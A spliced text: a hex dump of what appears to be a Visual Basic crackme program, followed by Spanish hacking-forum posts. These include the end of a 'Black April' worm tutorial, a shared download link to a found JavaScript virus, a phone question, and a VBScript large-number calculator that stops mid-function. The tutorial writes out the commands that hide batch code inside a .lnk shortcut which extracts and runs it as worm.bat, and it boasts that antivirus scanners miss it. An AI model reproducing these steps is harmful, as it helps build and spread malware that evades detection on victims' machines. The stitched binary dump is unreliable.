9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000240500466F726D310026002700352D000000B3010000880E0000710700004603FF011C0000000106004672616D653100030578007800A70D9F06120000FF0135000000020A007478745F53657269616C000204F0006801C70B77010B0F00496E677265736120456C20436F6465001202002402FF032B000000030800436F6D6D616E6431000401090056657269666963617200044803380417077701110100FF02020400000007000000DC1E400050000000FE22228A455D81448B4E885B15F0513100000000000000000000000000000000000000009001000000000000000000000000000000000000000000004104000000000000581240004C00000056423521F01F56423645532E444C4C00000000002A000000000000000000000000000A000A0C000009040000000000008C1740001CF0300000FFFFFF080000000100000001000000E9000000A41640009C1640001412400078000000810000008B0000008C000000000000000000000000000000000000004B657947656E6D650050726F796563746F31000050726F796563746F31000000F4010000E41C400000000000E021400040264000FC0900000830400016114000003040002A005C00410043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C0046006C0061006D00650072005C004D0069007300200064006F00630075006D0065006E0074006F0073005C004800610063006B0069006E0067005C0043007200610063006B0069006E0067005C004D0069007300200043007200610063006B006D00650073005C0043007200610063006B006D006500200037005C00500072006F0079006500630074006F0031002E0076006200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1640000100000001000000E41C4000000000003C214000FFFFFFFF00000000381D40000830400001000000401A4000000000000000000000000000401A400001000000A01D400000000000441A4000010000004C1A400000000000481A4000040000004C1A40000400B70168006C00EC1A4000F032400000000000A0DA200000000000B01D4000C01D4000400018003C000000D01D4000020003000000000000000000FC1A400050CF2000E01D4000020003004000110040000000681E4000030003000000000000000000741B400060CF2000781E40000300030040000D0044000000841E4000010003000000000000000000D01B400070CF2000941E40000100030040001F00480000009C1E4000FFFFFFFF00000000000000001C1C400080CF2000AC1E4000FFFFFFFFD21C4000DF1C4000B81C4000C51C4000000000004C1A4000C8194000EE114000F4114000FA11400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000741A4000C8194000EE114000F4114000FA114000B01C400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1A4000C8194000EE114000F4114000FA1140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C41A4000C8194000EE114000F4114000FA114000000000000000000000000000000000000000000000000000BD1C4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000816C24043F000000E933050000816C240447000000E976060000816C2404FFFF0000E949070000816C2404FFFF0000E94C080000000000002C3040007C214000FFFFFFFF000000001C304000988DAE1D6306F14EABE1CAAE39F6073E0A00010001000100381D4000000000000000000000000000841D4000090400000A0C00000000000002000000C8194000FFFFFFFF201F40000000000000000000000000007C1D400005000000681D4000FFFF0000838001000000000073007400650069006E002900101F40001C1F4000466F726D3100000050726F796563746F3100000042E3E915F7541E4B93B8F05E7BD7080757CC2B8E8DA552469C17B77ECC47F6FCFE22228A455D81448B4E885B15F0513144E923EC7903FB479066AA7CD42C4AF7E24EAD339966CF11B70C00AA0060D3937478745F53657269616C00002E3DFBFCFAA06810A73808002B3371B5433A5C4172636869766F732064652070726F6772616D615C4D6963726F736F66742056697375616C2053747564696F5C564239385C5642362E4F4C420000000056420000EC1D4000000000000600000009000000FC1D40003C1E4000D03240000000000000000000A8161C00F24EAD339966CF11B70C00AA0060D393436F6D6D616E643100000000EA4EAD339966CF11B70C00AA0060D3934672616D653100003A4FAD339966CF11B70C00AA0060D393466F726D00000000090000006B65726E656C333200000000120000004973446562756767657250726573656E74000000B81E4000C81E400000000400D43240000000000000000000A1DC3240000BC07402FFE068DC1E4000B8A0114000FFD0FFE0000000436F72726563746F000000004D616C000C0054000000000000000000E14EAD339966CF11B70C00AA0060D393F14EAD339966CF11B70C00AA0060D3937200000043006F00720072006500630074006F002E002E002E002E00460065006C0069007300690064006100640065007300200041006D00690067006F002000410068006F00720061002000500072006F006700720061006D006100200045006C0020004B0065007900670065006E002E002E002E0000001000000043006F00720072006500630074006F000000000022000000530065007200690061006C00200049006E0063006F00720072006500630074006F0000000A0000004500720072006F0072000000564241362E444C4C000000005F5F766261467265655661724C697374000000005F5F766261566172447570005F5F7662614F626A53657400000000005F5F76626153657453797374656D4572726F72005F5F7662614578697450726F630000005F5F766261467265654F626A000000005F5F76626146726565537472000000005F5F76626148726573756C74436865636B4F626A000000005F5F766261493453747200005F5F7662614F6E4572726F72000000005F5F766261467049340000003C2140000000000000000000000000000000000000000000F4204000182140000000F906FFFF00000000000002000360D42040000000000000000000000000001E0000000000FD06FFFF00000000000003000360D42040000000000000000000000000001E00000000000000C8194000FFFFFFFF000000000200000000000000E020400000000000D8204000D4204000D4204000000000000000000000000000540000000400000000000000E41C4000FFFFFFFF00000000D4204000000000000000000000000000FFFFFFFF00000000401E4000D01D4000E0324000401E4000681E4000E4324000401E4000841E4000E8324000401E40009C1E4000EC324000CCCCCCCCCCCCCCCCCCCCCCCCE9E9E9E9CCCCCCCCCCCCCCCCCCCCCCCC558BEC83EC14681611400064A100000000506489250000000083EC205356578965ECC745F0A81040008B75088BC683E0018945F483E6FE89750833DB895DF88B0E56FF5104895DE0895DDC66837E38FF750FDD05D0104000FF15881040008946346A01FF15241040008B1656FF9200030000508D45DC50FF15281040008BF88B0F8D55E05257FF91A0000000DBE23BC37D1268A0000000682C1F40005750FF15181040008B45E050FF15741040008946348D4DE0FF159C1040008D4DDCFF15A01040008B463499B911000000F7F989563483FA0275148B1656FF92F80600003BC37D2968F8060000EB158B75088B0656FF90FC06000085C07D1268FC06000068C01D40005650FF1518104000FF15201040009B681E234000EB138D4DE0FF159C1040008D4DDCFF15A0104000C3C38B45088B0850FF51088B45F48B4DE464890D000000005F5E5B8BE55DC20400909090558BEC83EC0C681611400064A100000000506489250000000083EC185356578965F4C745F8D81040008B75088BC683E0018945FC83E6FE568975088B0EFF510433DB895DE866895E38E866FBFFFF8BF8FF15141040003BFB740666C74638FFFF8B1656FF9204030000508D45E850FF15281040008BF053568B0EFF918C0000003BC3DBE27D12688C000000683C1F40005650FF15181040008D4DE8FF15A0104000895DFC68F6234000EB0A8D4DE8FF15A0104000C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8E810400033F68975FC8B4508508B08FF51048B3D84104000B904000280894DB4B80A000000894DC4BB080000008975BC8975AC89758C8D558C8D4DCC8975DC8975CC89759C8945AC8945BCC74594C81F4000895D8CFFD78D559C8D4DDCC745A4501F4000895D9CFFD78D55AC8D45BC528D4DCC50518D55DC5652FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146807254000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC2040090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8F810400033F68975FC8B4508508B08FF5104B9040002808975DC8975CC8975BC8975AC89759C89758C8B3584104000894DB4B80A000000894DC4BF080000008D558C8D4DCC8945AC8945BCC7459408204000897D8CFFD68D559C8D4DDCC745A4E01F4000897D9CFFD68D55AC8D45BC528D4DCC50518D55DC6A1052FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146818264000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909E9E9E9E6C260000FFFFFFFFFFFFFFFF14270000001000000000000000000000000000000000000000000000222700002C2700003A2700004E2700005E2700006C270000822700009A270000AA270000BA270000CA27000053020080D8270000EA270000FC2700000628000014280000282800003A280000482800005E28000068280000842800009A280000A8280000BA280000CE280000D8280000EA280000FC2800000A2900001C290000640000802A29000038290000442900004E29000058290000622900006C2900007C290000000000004D535642564D36302E444C4C000000005F4349636F73000000005F61646A5F667074616E000000005F5F766261467265655661724C697374000000005F61646A5F666469765F6D36340000005F61646A5F667072656D310000005F5F76626153657453797374656D4572726F720000005F5F76626148726573756C74436865636B4F626A000000005F61646A5F666469765F6D33320000005F5F7662614578697450726F630000005F5F7662614F6E4572726F72000000005F5F7662614F626A5365740000005F61646A5F666469765F6D313669000000005F61646A5F66646976725F6D3136690000005F434973696E000000005F5F76626143686B73746B0000004556454E545F53494E4B5F416464526566000000446C6C46756E6374696F6E43616C6C0000005F61646A5F66706174616E0000004556454E545F53494E4B5F52656C65617365000000005F4349737172740000004556454E545F53494E4B5F5175657279496E746572666163650000005F5F76626145786365707448616E646C6572000000005F61646A5F667072656D000000005F61646A5F66646976725F6D3634000000005F5F7662614650457863657074696F6E000000005F43496C6F67000000005F61646A5F666469765F6D333269000000005F61646A5F66646976725F6D3332690000005F5F7662614934537472000000005F61646A5F66646976725F6D3332000000005F61646A5F666469765F720000005F5F7662615661724475700000005F5F766261467049340000005F43496174616E0000005F616C6C6D756C0000005F434974616E000000005F4349657870000000005F5F76626146726565537472000000005F5F766261467265654F626A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007180B743000000000000030003000000580000800E000000400000801000000028000080000000007180B74300000000000001000100000070000080000000007180B74300000000000001000100000088000080000000007180B743000000000000010031750000A0000080000000007180B74300000000000001000A0C0000B8000000000000007180B743000000000000010000000000C8000000000000007180B743000000000000010000000000D8000000F040000028020000B0040000000000001843000014000000B0040000000000002C430000E8020000B0040000000000000000000000000000280234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000010000000000000001000000000000000000000000000400000001000000000000000000000000000000440000000000560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000A0CB00488010000010053007400720069006E006700460069006C00650049006E0066006F00000064010000010030004300300041003000340042003000000044002200010043006F006D00700061006E0079004E0061006D006500000000004100670065006E00630069006100200043007200610063006B0069006E00670000000000340014000100500072006F0064007500630074004E0061006D00650000000000500072006F0079006500630074006F00310000002C000A000100460069006C006500560065007200730069006F006E000000000031002E00300030000000000030000A000100500072006F006400750063007400560065007200730069006F006E00000031002E00300030000000000034001200010049006E007400650072006E0061006C004E0061006D00650000004B0065007900470065006E006D0065000000000044001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004B0065007900470065006E006D0065002E00650078006500000000000000010001002040000001000400E802000031752800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000



ahora nos ase falta el acceso directo el cuan anterior mente llamamos "6.lnk" y contendrá lo mismo en el campo destino

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

ahora ya para terminar pasaremos a juntarlos con el simbolo del sistema y teclearemos esto


copy /b 6.lnk+comandos.bat+code.txt w.lnk


como resultado nos creara el archivo "w.lnk" el cual si ejecutamos %&$+#01(*%$  ya saben lo que pasa jajajajaja

Saludos Flamer y hay esta el tutorial que prometí ase muchos años Feliz Abril Negro

Nota: y si le pasan el virustotal verán que ninguno lo detecta hasta ahora


#34
bueno como todo esta dormido por aqui, asi que les dejo un código de un virus que me encontré en una memoria USB

http://www.mediafire.com/file/rcpso4iy9f9bn2t/virus_js.rar

A ver quien es el voluntario que lo destripe

Saludos Flamer y si no lo destripa nadie tendré que hacerlo yo
#35
hola amigos por querer eliminar un virus de mi celular borre por accidente la pantalla de inicio de mi celular o para que me entiendan el menu.

solo puedo entrar en ajustes de configuración y a las opciones de tengo en las pestañas de arriba de la pantalla de mi celular pero las aplicaciones instaladas no.


soy usurio root y el modelo es un polaroid pspc505

saludos y mi duda es que apk tengo que instalar y de donde
#36
Scripting / [Aporte] Super Calculadora
31 Diciembre 2016, 20:36 PM
ahora vengo con otro código una calculadora en Vbscript de numeros grandes
la idea me surgio al ver esta pagina: http://www.elguille.info/NET/dotnet/operarConNumerosGrandes1.htm

pero en algunas operaciones observe que no daba el resultado correcto así que hice la mía mejor

Nota: si ponen muy grandes tardara en hacer la operación

Aquí el code

Código (vb) [Seleccionar]

Option Explicit

Dim num1, num2, n, m, x, op, r,v

num2 = inputbox("Introduce El Primer Numero")'"123654789"
num1 = inputbox("Introduce Segundo Numero")'"147852369"

ReDim n(Len(num1)), m(Len(num2))

For x = 1 To Len(num1)
   n(x) = CInt(Mid(num1, x, 1))
Next

For x = 1 To Len(num2)
   m(x) = CInt(Mid(num2, x, 1))
Next

op = InputBox("1- Sumar" & vbCrLf & "2- Restar" & vbCrLf & "3- Multiplicar" & vbCrLf & "4- Dividir")

Select Case op
   Case "1"
      r = sumar(n, m)
   Case "2"
      r = RestaroDividir(n, m, op)
   Case "3"
      v = mmi(num1,num2)
      if v = "+" then
     r = multiplicar(n,m)
  elseif v = "-" then
         r = multiplicar(m, n)
      else
     r = multiplicar(n, m)
  end if     
   Case "4"
      r = RestaroDividir(n, m, op)
End Select
MsgBox r
r = Replace(r, " ", "")

Function Dividir(n, m)
On Error Resume Next
   Dim num1, num2, pf, d, x, s, j, r, mk
   
   num1 = Replace(Join(n), " ", "")
   num2 = Replace(Join(m), " ", "")

   pf = UBound(m)
   
   d = Mid(num1, 1, pf)
   
   While pf <= UBound(n)  'pf
     
      Select Case mmi(d, num2)
         Case "+"
            x = "0"
            s = "0"
            ReDim md(Len(d))
            For j = 1 To Len(d)
               md(j) = Mid(d, j, 1)
            Next
            While mmi(s, d) = "-"
               x = CStr(CDbl(x) + 1)
               
               ReDim mx(Len(x))
               ReDim ms(Len(num2))
               
               For j = 1 To Len(num2)
                  ms(j) = Mid(num2, j, 1)
               Next
               
               For j = 1 To Len(x)
                  mx(j) = Mid(x, j, 1)
               Next
               s = Replace(multiplicar(ms, mx), " ", "")
            Wend
            If mmi(s, d) <> "1" Then
                x = CStr(CDbl(x) - 1)
            End If
             
               ReDim mx(Len(x))
               
               For j = 1 To Len(x)
                  mx(j) = Mid(x, j, 1)
               Next
               
               mk = Split(multiplicar(mx, m), " ")
                                               
               d = Replace(RestaroDividir(mk, md, "2"), " ", "")
               While Mid(d, 1, 1) = "0"
                  d = Mid(d, 2, Len(d))
               Wend
             
               r = r & x
               
              pf = pf + 1
              d = d & n(pf)
           
         Case "-"
            r = r & "0"
            pf = pf + 1
            d = d & n(pf)
         Case "1"
            r = r & "1"
            pf = pf + 1
            d = n(pf)
      End Select
   Wend
   While Mid(r, 1, 1) = "0"
      r = Mid(r, 2, Len(r))
   Wend
   Dividir = "Caben:-" & r & "----Sobran:-" & d
End Function

Function mmi(num1, num2)
   Dim x, r
   
   While Mid(num1, 1, 1) = "0"
      num1 = Mid(num1, 2, Len(num1))
   Wend
   While Mid(num2, 1, 1) = "0"
